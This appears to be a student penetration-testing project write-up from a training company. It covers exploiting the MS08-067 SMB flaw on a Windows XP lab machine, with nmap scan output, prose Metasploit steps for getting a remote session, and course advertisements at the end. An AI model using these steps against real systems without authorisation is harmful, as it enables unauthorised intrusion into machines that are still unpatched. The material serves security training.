Exploitation of Windows XP, SP2 –
Remote exploitation of Windows XP
Exploitation is a piece of programmed software or script which can allow hackers to take control over a system, exploiting its vulnerabilities. Hackers normally use vulnerability scanners like Nessus, Nexpose, OpenVAS, etc. to find these vulnerabilities.
Remote Exploitation of Windows XP project done by ICSS Student Adrish Mitra. Here discussed the full process below.
Project Name: Remote Exploitation of Windows XP
Author Name: Adrish Mitra
Publish Date: 24-07-2018
Exploit Documentation
Subject: Remote exploitation of Windows XP
Vulnerabilities – Threat level
Smb-vuln-cve2009-3103 – Medium
Smb-vuln-ms08-067 – High
Smb-vuln-ms10-054 – False
Smb-vuln-ms10-061 – Error
Hacking windows using remote exploit for ms08_067 vulnerability:
1. Scanning the target system using nmap .
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-11 10:19 IST
Nmap scan report for 192.168.0.122
Host is up (0.00015s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka “SMBv2 Negotiation Vulnerability.”
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| aka “SMBv2 Negotiation Vulnerability.”
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
2. For remote execution of the code open msf console and search the exploit code for ms08_067.
The exploit code for the ms08_067 vulnerability is shown.
3. Use this exploit.
4. Set the rhost as the victims ip and rport as the port number where the service related to ms08_067. By default the service runs on the port 445
Now upload the exploit file to the victim’s system. A session will be created in msf console and we can have remote access to the machine.
5. The system information for the victim’s system.
6. A confirmation of an established connection with the msf hacker’s system can be seen in the victim’s machine by seeing the list of foreign ip addresses.
Exploits other than Ms08-067
Smb-vuln-cve2009-3103:
VULNERABLE:
SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
State: VULNERABLE
IDs: CVE: CVE-2009-3103
Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE .
PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
aka “SMBv2 Negotiation Vulnerability.”
Disclosure date: 2009-09-08
From the above nmap scan report we can conclude that the target machine can’t be exploited using this vulnerability.
Smb-vuln-ms10-054: false
Therefore, from the above nmap report we can conclude that the vulnerability cannot be implemented to exploit the target machine
Smb-vuln-ms10-061: ERROR: Script execution failed.
Therefore, from the above nmap report we can conclude that the vulnerability cannot be implemented to exploit the target machine.
Highest Selling Technical Courses of Indian Cyber Security Solutions:
Amazon Web Services Training in Hyderabad
Amazon Web Services Training in Bangalore
Amazon Web Services Training in Bhubaneswar
Summer Training for CSE, IT, BCA & MCA Students
Network Penetration Testing training
Certified Network Penetration Tester
Diploma in Web Application Security
Certified Web Application Penetration Tester
Certified Android Penetration Tester
Cybersecurity services that can protect your company:
Web Security | Web Penetration Testing
Network Penetration Testing – NPT
Android App Penetration Testing
Other Location for Online Courses:
